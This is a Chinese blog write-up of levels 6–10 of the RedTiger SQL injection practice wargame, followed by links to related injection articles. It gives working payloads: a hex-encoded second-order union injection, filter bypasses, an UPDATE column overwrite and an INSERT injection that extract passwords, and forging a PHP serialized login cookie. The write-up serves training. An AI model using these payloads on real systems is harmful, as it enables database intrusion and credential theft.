Redtiger SQL注入练习(二)
第六关:
点击 click me,构造url:user=1',返回user not found。user=1'',同样。
猜测是数字型注入,构造order by , user=1 order by X#,得出有5个字段。
然后,user=0 union select 1,2,3,4,5#,说user not found。不是吧。。。。
用username试试吧,user=0 union select 1,username,3,4,5 from level6_users where status=1#
返回如图:
接下来就需要找密码了。用password试了5个位置,没用。想了好长时间,没有啥思路,只能看大佬的writeup了。(参考https://blog.spoock.com/2016/07/25/redtiger-writeup/)
知道了可能是sql二次查询:
1 |
$sql = "select username,password from level6_users where id=1"; |
构造payload:user=0 union select 1,admin'union select 1,2,3,password,5 from level6_users where status=1#,3,4,5# 返回 user not found, 哦,fuck。
大佬说转换成16进制,脑子不够用,emmmmmm。
最终payload:user=0 union select 1,0x061646d696e3127756e696f6e2073656c65637420312c322c332c70617373776f72642c352066726f6d206c6576656c365f7573657273207768657265207374617475733d3123,3,4,5#
第七关:
提示如上,过滤了一堆东西,输入一个 ' 试试,报错并且返回sql语句:
思考后,先把括号闭合,然后经过测试,order by 被ban了,而且注释 # 和-- 也无效。
order by 可以直接用 union select猜 ,注释 -- ,空格可以用%a0等等替换,构造
payload:')union select 1--%a0, 只能用burp抓包改值,hackbar post提交不行,不知道为啥,搞了半天没结果。猜测出列数为4。
结果只显示,3和4.之后注入:')union select 1,2,autor,4 from level7_news--%a0
最后得到答案。
第八关:
看到4个输入框,分别输入一次单引号,发现只有email后可以注入,
然后没什么思路了,看了大佬们的操作,猜测后台的语句为:
update table set name='[inputname]',email='[inputemail]',icq='[inputicq]',age='[inputage]' where id=1
update 语句 后边的值会覆盖前边的值,比如:update table set name=1,email=2,name=2.........
此时 name最终是2。
于是我们构造:',name=password,icq='1
得到admin用户的密码。
第九关:
测试发现在text 初添加' 会报错,这里存在注入点。
猜测后台语句为:
insert into tablename(autor,title,text) values('[inputautor]','[inputtitle]','[inputtext]')。
于是构造:
'), ((select username from level9_users limit 1), (select password from level9_users limit 1),'456
得到用户名和密码。参考(https://blog.spoock.com/2016/07/25/redtiger-writeup/).
第十关:
这关和php序列化有关,比较懵。
看源代码,有一串base64加密的东西,解密得到:
a:2:{s:8:"username";s:6:"Monkey";s:8:"password";s:12:"0815password";}
提示只能用TheMaster登录,但是密码不知道,序列化,可以把密码改成布尔值为1.
于是改为:a:2:{s:8:"username";s:9:"TheMaster";s:8:"password";b:1;}
base64加密后提交过关。
Redtiger SQL注入练习(二)的更多相关文章
- SQL注入之二次,加解密,DNS等注入
#sql注入之二次注入 1.注入原理 二次注入可以理解为,构造恶意数据存储在数据库后,恶意数据被读取并进入到了SQL查询语句所导致的注入.恶意数据插入到数据库时被处理的数据又被还原并存储在数据库中,当 ...
- SQL注入原理二
随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多. 但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候 ,没有对用户输入数据的合法性进行判断,使应用程序存 ...
- sql注入总结(二)--2018自我整理
0x00前言: 继上篇的内容,这章总结下二次注入,python脚本,bypass 上篇sql注入总结(一)--2018自我整理 0x01二次注入: 二次注入的原理是在把非法代码添加进数据库里面存储了, ...
- 170605、防止sql注入(二)
java filter防止sql注入攻击 原理,过滤所有请求中含有非法的字符,例如:, & < select delete 等关键字,黑客可以利用这些字符进行注入攻击,原理是后台实现使 ...
- Redtiger SQL注入练习(一)
感觉会的东西太少了,以后要多练习,多写博客.要坚持学习,一定不能放弃,为梦想奋斗. redtiger 这个平台早就开始做了,但是才做到第4关.... 第一关: 打开题, 先随便试,后来发现点击 Ca ...
- 十七:SQL注入之二次加解密,DNS注入
加解密,二次,DNSlog注入 注入原理,演示案例,实际应用. less-21关,base64进行解密 encode加密decode解密 cookie处注入 判断加密算法,然后进行注入 less-24 ...
- SQL注入篇二------利用burp盲注,post注入,http头注入,利用burpsuit找注入点,宽字节注入
1.布尔盲注burpsuit的使用 先自己构造好注入语句,利用burpsuit抓包,设置变量,查出想要的信息. 比如----查数据库名的ascii码得到数据库构造好语句 http://123.206. ...
- C#防SQL注入代码的实现方法
对于网站的安全性,是每个网站开发者和运营者最关心的问题.网站一旦出现漏洞,那势必将造成很大的损失.为了提高网站的安全性,首先网站要防注入,最重要的是服务器的安全设施要做到位. 下面说下网站防注入的几点 ...
- sql注入的防护
一.严格的数据类型 在Java,C#等高级语言中,几乎不存在数字类型注入,而对于PHP,ASP等弱类型语言,就存在了危险. 防御数字型注入相对简单,如果不需要输入字符型数据,则可以用is_numeri ...
随机推荐
- 【Java基础】【11Eclipse使用&Object类型】
11.01_Java开发工具(常见开发工具介绍)(了解) A:操作系统自带的记事本软件 B:高级记事本软件 C:集成开发环境 IDE (Integrated Development Environme ...
- centos7修改网卡名字为传统名字
前言:在centos6及其之前的系统中,我们已经习惯了网卡为eth0,eht1这种网卡命名方式,在centos7上网卡名字为ens33,ens37,ens38等名字,很别扭,想统一下网卡的命名. 1 ...
- win10下rdlc报表在vs(visual studio)中中文显示小方块的批量处理解决方法
在网上找vs中rdlc报表显示中文时显示小方块的解决方案,无外就是修改文本框的字体属性.但是对于维护已有的rdlc报表时,有中文的地方(此时都显示了小方块)会很多,再一个一个设置实在太麻烦.所以自己花 ...
- C# 给现有PDF文档添加页眉、页脚
概述 页眉页脚是一篇完整.精致的文档的重要组成部分.在页眉页脚处,可以呈现的内容很多,如公司名称.页码.工作表名.日期.图片,如LOGO.标记等.在之前的文章中介绍了如何通过新建一页空白PDF页来添加 ...
- C# Html格式内容转Csv内容包括table(重点在rowspan和colspan合并),p,div元素
Html格式内容转Csv内容,包括table(重点在rowspan和colspan合并),p,div元素,table不能包含嵌套功能. /// <summary> /// Html格式内容 ...
- C# 动态生成word文档
本文以一个简单的小例子,简述利用C#语言开发word表格相关的知识,仅供学习分享使用,如有不足之处,还请指正. 在工程中引用word的动态库 在项目中,点击项目名称右键-->管理NuGet程序包 ...
- eclipse如何修改android工程的包名?
在我们android项目开发到一定的程度时由于需要,我们必须修改一下工程的包名,以便更好的发布我们的项目.但是在这个过程中有时候修改好了之后会出现一些错误.下面由小编一步步教你如何更改包名,和解决出现 ...
- 对象的使用处理,作用域的和ajax中this的理解
首先,封装类,理解清楚你需要用的哪几个变量,然后声明,然后在类里封装函数,其中,constructor就是存放初始变量的地方. 这里还是datatable的处理解决, constructor(tabl ...
- WordCount结对项目
合作者:201631062124,201631062423 代码地址:https://gitee.com/yryx/WordCount 作业地址:https://edu.cnblogs.com/cam ...
- jQuery遍历—each()方法遍历对象和数组
打开控制台后可以看到以下输出: